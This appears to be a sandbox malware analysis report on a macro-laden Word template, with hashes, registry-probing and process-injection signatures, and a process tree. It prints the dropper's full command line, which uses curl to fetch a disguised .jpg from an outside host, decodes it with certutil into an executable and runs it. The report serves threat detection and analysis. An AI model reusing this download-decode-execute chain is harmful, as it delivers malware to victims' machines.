Analysis

max time kernel: 111s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10/04/2024, 10:22
Behavioral task: behavioral1
Sample: 383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
Resource: win7-20240221-en

Behavioral task: behavioral2
Sample: 383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
Resource: win10v2004-20240226-en
General

Target: 383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
Size: 16KB
MD5: 0fb9bb549173482cfe4faa67ac22a960
SHA1: aad49c13d5b80c4b9022889cc9d56bbc04d0f496
SHA256: 383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f
SHA512: ff07db920400bb41a62e7da0f4d54a46fd3b2f56a70789b8f9d8868f93784b6468dd656cea7367e14add124db346896d44619fb041d957658bdc298dd06b43e4
SSDEEP: 384:tmtNHjUtc6WGaLmrHzVHRQTtxcdV0pjMNJSOTesmB3Dl:qZpG6mrZKpOMp9OTehP
Malware Config
Signatures
Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.

| description | pid | pid_target | Process | procid_target |
|---|---|---|---|---|
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4596 | 3448 | cmd.exe | 90 |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2780 | 3448 | cmd.exe | 90 |
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE |
Enumerates system info in registry (2 TTPs, 3 IoCs)

| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE |
Suspicious behavior: AddClipboardFormatListener (2 IoCs)

| pid | Process |
|---|---|
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
Suspicious use of SetWindowsHookEx (7 IoCs)

| pid | Process |
|---|---|
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
| 3448 | WINWORD.EXE |
Suspicious use of WriteProcessMemory (12 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 3448 wrote to memory of 4596 | 3448 | WINWORD.EXE | 98 |
| PID 3448 wrote to memory of 4596 | 3448 | WINWORD.EXE | 98 |
| PID 4596 wrote to memory of 1616 | 4596 | cmd.exe | 102 |
| PID 4596 wrote to memory of 1616 | 4596 | cmd.exe | 102 |
| PID 4596 wrote to memory of 4484 | 4596 | cmd.exe | 103 |
| PID 4596 wrote to memory of 4484 | 4596 | cmd.exe | 103 |
| PID 3448 wrote to memory of 2780 | 3448 | WINWORD.EXE | 108 |
| PID 3448 wrote to memory of 2780 | 3448 | WINWORD.EXE | 108 |
| PID 2780 wrote to memory of 744 | 2780 | cmd.exe | 110 |
| PID 2780 wrote to memory of 744 | 2780 | cmd.exe | 110 |
| PID 2780 wrote to memory of 876 | 2780 | cmd.exe | 111 |
| PID 2780 wrote to memory of 876 | 2780 | cmd.exe | 111 |
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 3448, depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm" /o ""
  Signatures:
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 4596, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe
    Signatures:
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe (PID 1616, depth 3)
      Command line: curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg
    - C:\Windows\system32\certutil.exe (PID 4484, depth 3)
      Command line: certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe
  - C:\Windows\System32\cmd.exe (PID 2780, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe
    Signatures:
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe (PID 744, depth 3)
      Command line: curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg
    - C:\Windows\system32\certutil.exe (PID 876, depth 3)
      Command line: certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3744, depth 1)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3348 --field-trial-handle=2256,i,18272763564106695635,11201593968620719822,262144 --variations-seed-version /prefetch:8